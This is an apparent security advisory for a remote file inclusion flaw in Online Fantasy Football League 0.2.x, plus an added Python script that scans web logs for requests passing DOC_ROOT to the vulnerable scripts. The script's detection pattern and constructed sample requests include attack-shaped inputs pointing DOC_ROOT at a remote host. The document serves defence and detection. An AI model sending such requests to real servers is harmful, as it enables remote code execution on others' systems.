OFFL.DOC.ROOT.File.Inclusion
Description
This indicates a vulnerability in Online Fantasy Football League (OFFL). The vulnerability is caused by the failure to validate the "DOC_ROOT" parameter in the "lib/functions.php" and "lib/header.php" scripts. It allows remote attackers to include malicious PHP scripts and execute arbitrary commands.
Affected Products
OFFL OFFL 0.2.6
OFFL OFFL 0.2.3
Impact
System compromise, remote script execution.
Recommended Actions
Currently we are not aware of any official fix for this issue.
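With no official fix available, web server logs can be reviewed for requests that pass "DOC_ROOT" to the two scripts. The following is an added example, not part of the original advisory or of OFFL; it assumes combined-format access logs and that legitimate clients never send "DOC_ROOT" themselves, and its sample log lines are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

SCRIPTS = ("lib/functions.php", "lib/header.php")  # scripts named in the advisory
PARAM = "DOC_ROOT"                                 # parameter named in the advisory
# A URL scheme or PHP wrapper ("http:", "ftp:", "php:"), "//host" or a UNC path.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]+:|//|\\\\)", re.I)
# Client address, request target and status from a combined-format log line.
LOG = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3})')

def classify(target):
    """Return None, 'supplied' or 'remote' for one request target."""
    parts = urlsplit(target)
    if not unquote(parts.path).lower().endswith(SCRIPTS):
        return None
    verdict = None
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name != PARAM:
            continue
        # parse_qsl decodes once; decode again to catch double encoding.
        if REMOTE.match(unquote(value)):
            return "remote"
        verdict = "supplied"  # assumption: clients have no reason to set it
    return verdict

def scan(lines):
    """Return (client, verdict, status) for every suspicious log line."""
    hits = []
    for line in lines:
        m = LOG.match(line)
        verdict = classify(m.group(2)) if m else None
        if verdict:
            hits.append((m.group(1), verdict, int(m.group(3))))
    return hits

# Constructed sample lines (documentation addresses, .invalid host).
T = '[10/Oct/2023:13:55:36 +0000]'
SAMPLE = [
    f'198.51.100.7 - - {T} "GET /offl/lib/header.php?DOC_ROOT=http://host.invalid/x HTTP/1.1" 200 512',
    f'198.51.100.7 - - {T} "GET /offl/lib/functions.php?DOC_ROOT=%2568ttp%3A%2F%2Fhost.invalid%2Fx HTTP/1.1" 200 80',
    f'203.0.113.9 - - {T} "GET /offl/lib/header.php?DOC_ROOT=/var/www/offl/ HTTP/1.1" 403 0',
    f'203.0.113.20 - - {T} "GET /offl/lib/functions.php HTTP/1.1" 200 0',
    f'203.0.113.20 - - {T} "GET /offl/index.php?page=teams HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

Only the query string is inspected, because access logs do not record POST bodies; a "remote" hit answered with status 200 deserves the first look.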
Coverage
IPS (Regular DB)
IPS (Extended DB)